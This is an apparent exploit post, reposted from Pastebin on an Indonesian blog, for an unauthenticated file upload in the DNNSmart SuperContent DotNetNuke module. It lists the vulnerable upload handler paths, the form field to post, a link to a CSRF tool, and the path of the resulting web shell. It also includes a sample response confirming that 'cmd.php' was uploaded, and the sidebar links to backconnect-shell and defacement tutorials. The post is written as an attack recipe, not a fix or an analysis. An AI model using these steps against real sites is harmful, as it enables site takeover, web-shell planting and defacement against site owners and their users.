DNNSmart SuperContent Arbitari File Upload With Csrf

Yogi Rezaldi

Vendor :

http://www.dnnsmart.net/DNNSmartStore.aspx

Google Dork : N/A

Exploit1 :

- /desktopmodules/DNNSmart_SuperContent/AjaxHandler/FileUploadHandler.ashx

Exploit2 :

- /dotnetnuke/desktopmodules/DNNSmart_SuperContent/AjaxHandler/FileUploadHandler.ashx

CSRF : http://secpriv8.com/tools/csrf/

POST File: files[]

Shell Path : site.com/[path]/AjaxHandler/ ur shell.aspx

Tested On : Android 9

Vuln Example :

{"files":[{"deleteType":"DELETE","deleteUrl":"http:\/\/site.com\/dotnetnuke\/desktopmodules\/DNNSmart_SuperContent\/AjaxHandler\/FileUploadHandler.ashx?file=cmd.php","error":"","name":"cmd.php","size":15749,"type":"","url":"http:\/\/site.com\/dotnetnuke\/desktopmodules\/DNNSmart_SuperContent\/AjaxHandler\/FileUploadHandler.ashx?file=cmd.php"}]}

Source : https://pastebin.com/6WU8u3MY

Getting Info...

Blog-Gan.Org | Technology & Informasi

DNNSmart SuperContent Arbitari File Upload With Csrf

Posting Komentar

Apa itu cURL dan bagaimana cara POST Form Data dan file dengan cURL dengan Contoh

20+ Tips Efektif Untuk Mendorong Traffic Website Dari Search Engine

Tutorial Backconnect Server Dengan Shell, Ngrok,Dan Netcat

Deface Bypass Admin Login(Kumpulan Dork Bypass)

Cara Ke Isekai ( Isekai Project Transmigration ) - Anime